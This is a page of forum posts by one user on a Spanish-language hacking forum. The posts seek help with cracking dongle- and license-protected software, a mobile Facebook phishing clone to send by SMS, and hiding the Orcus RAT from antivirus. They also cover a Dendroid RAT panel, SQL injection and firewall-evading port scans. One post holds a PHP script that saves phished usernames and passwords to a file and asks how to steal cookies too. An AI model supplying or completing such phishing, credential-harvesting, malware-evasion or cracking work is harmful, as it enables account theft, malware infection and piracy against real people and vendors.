Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - wooooph

#1
hola compañeros estoy practicando con un software y se me presentan estas protecciones

Código: dos
-=[ ProtectionID v0.6.6.7 DECEMBER]=-
(c) 2003-2015 CDKiLLER & TippeX
Build 24/12/14-22:48:13
Ready...
Scanning -> C:\Program Files (x86)\DdxProgStone\EasyStone\TEasyStone.exe
File Type : 32-Bit Exe (Subsystem : Win GUI / 2), Size : 8610816 (0836400h) Byte(s)
Compilation TimeStamp : 0x589CA00E -> Thu 09th Feb 2017 16:59:58 (GMT)
[TimeStamp] 0x589CA00E -> Thu 09th Feb 2017 16:59:58 (GMT) | PE Header | - | Offset: 0x00000140 | VA: 0x00400140 | -
[TimeStamp] 0x589CA00E -> Thu 09th Feb 2017 16:59:58 (GMT) | DebugDirectory | - | Offset: 0x005A46C4 | VA: 0x009A5EC4 | -
[File Heuristics] -> Flag #1 : 00000100000001001101000000000000 (0x0404D000)
[Entrypoint Section Entropy] : 6.80 (section #0) ".text   " | Size : 0x45B29C (4567708) byte(s)
[DllCharacteristics] -> Flag : (0x8140) -> ASLR | DEP | TSA
[SectionCount] 7 (0x7) | ImageSize 0x8AF000 (9105408) byte(s)
[VersionInfo] Company Name : DDX s.r.l.- Brembate di Sopra (Bg) Italia
[VersionInfo] Product Name : EasySTONE by DDX
[VersionInfo] Product Version : 6.4.0.0
[VersionInfo] File Description : EasySTONE
[VersionInfo] File Version : 6.4b1
[VersionInfo] Original FileName : TEasyStone.exe
[VersionInfo] Internal Name : EasySTONE Trial
[VersionInfo] Legal Copyrights : DDX Srl Copyright (C) 2001-2017
[Debug Info] (record 1 of 1) (file offset 0x5A46C0)
Characteristics : 0x0 | TimeDateStamp : 0x589CA00E (Thu 09th Feb 2017 16:59:58 (GMT)) | MajorVer : 0 / MinorVer : 0 -> (0.0)
Type : 13 (0xD) -> Undocumented | Size : 0x368 (872)
AddressOfRawData : 0x5AA0D0 | PointerToRawData : 0x5A88D0
[!] LiCENSE - Sentinel LM protected !
[!] DONGLE - NetHASP Network Dongle references detected !
[CdKeySerial] found "Serial Number" @ VA: 0x005DF6A8 / Offset: 0x005DDEA8
[CdKeySerial] found "Invalid code" @ VA: 0x005E55C2 / Offset: 0x005E3DC2
- Scan Took : 1.234 Second(s) [0000006E6h (1766) tick(s)] [499 of 573 scan(s) done]


tiene alguien informacion para ayudarme?
#2
lo que quiero es enviarlo por SMS y cuando presione el link que aparezca adaptado a moviles
#3
 Hola compañeros hoy queria hacer una practica de un phising a un movil pero queria preguntar
como puedo hacer un clonacion de facebook en formato responsive adaptada a los moviles
ya que herramientas como setoolkit o httrack seria para enviarlo via email

un saludo
#4
Dudas y pedidos generales / Re:evasion de firmas
Junio 13, 2017, 03:55:53 PM
eso es andaba buscando tecnicas de modding
#5
Dudas y pedidos generales / evasion de firmas
Junio 13, 2017, 02:51:10 PM
Buenas estoy probando Orcus (rat) y claro como no lo detecta el antivirus
hace tiempo vi en el foro un par de programa para ir buscando firmas dentro de este e ir borrandolas?

me lo puede recordar alguien?

me recomendais otro metodo?

saludos
#6
hola compañeros estoy haciendo una practica y me falta añadir una opcion
para que muestre la ip y el dominio y que quede almacenado
$_SERVER['PHP_SELF']
$_SERVER['SERVER_NAME']
((COMO SERIA PARA CAPTURA LA COOKIE TAMBIEN???
y para guardar estos datos en el archivo datos.txt??

<?php
//Creamos el archivo datos.txt
//ponemos tipo 'a' para añadir lineas sin borrar
$domain=$_SERVER['SERVER_NAME']
$ip=$_SERVER['PHP_SELF']
$user= $_POST['User'];
$pass= $_POST['Pass'];
$file=fopen("datos.txt","a") or die("Problemas");
  //vamos añadiendo el contenido
fwrite($file,"Usuario: ");
fwrite($file,$user);
fwrite($file,"Contraseña: ");
fwrite($file,$pass);
fwrite($file,$domain);
fwrite($file,$ip);
fclose($file);
?>


#7
estupendo el tutorial
pero sabes de alguno mas avanzado?saludos
#8
buenas estoy con el tema de ingenieria inversa y me he encontrado con una proteccion hardlock dongle (alladin)

alguien tiene algun tutorial=?o me puede ayudar ?

lo que he encontrado en google no me queda m uy claro
#9
gracias compañero voy a echarle un vistazo
#10
Hola compañeros llevo tiempo solamente dedicamento a hacer pentesting y queria pedir algunos consejos

como analizan ustedes las webs?
como detectar fallos en los javascript??
y los errores en php?
prefieren manual o automatico? en caso automatico que utilizan?

#11
 Hola compañeros podria pasarme alguien esta herramienta?

la pido por aqui dado que la busco en google y no me fio de ninguna web..

muchas gracias
#12
Hola compañeros alguna vez he visto alguna herramienta para sacar la ip de usuarios de twiter atraves de sus fotos

--sabe alguien la herramienta?¿?¿?no recuerdo el nombre
#13
Dudas y pedidos generales / Duda ingenieria reversa
Noviembre 18, 2016, 11:39:51 AM
                    Hola buenas esta pregunta puede ser un poco complicada por mi forma de expresarme
pero mi duda es la siguiente
tengo un programa ej 1.exe que lo inicias y al no tener una licencia hacer una llamada a reg.exe es donde
piden unos datos para registrar este mismo
con ollydb en 1.exe busco todas las strings posibles relacionadas con reg.exe sin embargo no lo encuentro ..es la primera vez
que me pasa,,,
que otras opciones puedo indagar?
#14
 Buenas estoy estudiando ataques a ciegas de sql
y en este caso me gustaría preguntar a cerca de este parámetro

a diferencia del simple ' or ' ='1

Qué es lo que pasa en este? id2%0A or 1=1
#15
a ver la cuestion es que supuestamente tengo que conseguir el acceso a esa maquina virtual en mac
y ahora mismo solo dispongo de las tecnicas de nmap pero claro no me voy a escanear los 65000 puertos si cuando escaneo mas de 30 puertos a la vez me salta su firewall

se os ocurre otra tecnica u otra cosa?
#16
compañeros estoy escaneando una maquina virtual de ios que supuestamente se puede entrar por algun puerto pero al escanear
esto es lo que consigo
-Las demas pruebas me aparecen como puertos cerrados sin ningun tipo de informacion hasta ahora solo he conseguido esto
hay alguna forma de sacar mas informacion de esos puertos?
me he dado cuenta que si escaneo de 20 en 20 no salta el firewall pero claro del 1 al 65000...

root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~# nmap -p 20,21,22,80,443,445,8080,30,50,8000,9000,2,4,6,8,10,12,1,3,5,7,9 192.168.0.100 --badsum -sS
Starting Nmap 7.01 ( No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ) at 2016-09-25 18:35 CEST
Nmap scan report for 192.168.0.100
Host is up (0.00028s latency).
PORT     STATE    SERVICE
1/tcp    filtered tcpmux
2/tcp    filtered compressnet
3/tcp    filtered compressnet
4/tcp    filtered unknown
5/tcp    filtered unknown
6/tcp    filtered unknown
7/tcp    filtered echo
8/tcp    filtered unknown
9/tcp    filtered discard
10/tcp   filtered unknown
12/tcp   filtered unknown
20/tcp   filtered ftp-data
21/tcp   filtered ftp
22/tcp   filtered ssh
30/tcp   filtered unknown
50/tcp   filtered re-mail-ck
80/tcp   filtered http
443/tcp  filtered https
445/tcp  filtered microsoft-ds
8000/tcp filtered http-alt
8080/tcp filtered http-proxy
9000/tcp filtered cslistener
MAC Address: 00:0C:29:CC:A4:75 (VMware)
#17
Hola compañeros estoy probando dendroid y despues de tenerlo todo completo me falla este archivo al hacer algunas operaciones


PHP Error Message

Warning: Invalid argument supplied for foreach() in /home/a9230290/public_html/showpictures.php on line 9

Código: php
<?php
$uid = $_GET['uid'];

$dirname = "dlfiles/" . $uid . "/";

$images = glob($dirname."*.*");

echo '<button type="button" class="btn btn-default btn-small" onclick="deletePics(\'' . $uid . '\');">Delete All</button><br />';
foreach($images as $Camera) {
echo '<a href="'.$image.'" target="_blank"><img class="getimgimg" style="width: 250px; margin: 5px 5px 5px 5px;" src="'.$image.'" /></a>';
}
?>
#18
vale ya esta era mi navegador
#19
gracias
pero que raro intento descargarme los archivos pero no me deja por ejemplo est

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#20
Hola compañeros despues de usar las herramientas automatizadas muchas se dejan cosas por el camino

me gustaria saber si tenemos en el foro  tutoriales avanzados "manuales" de los siguientes temas que no he encontrado:

-SQL INJECTION

-REMOTE CODE EXECUTION

Bueno en realidad todos lo que tenga que ver con auditoria web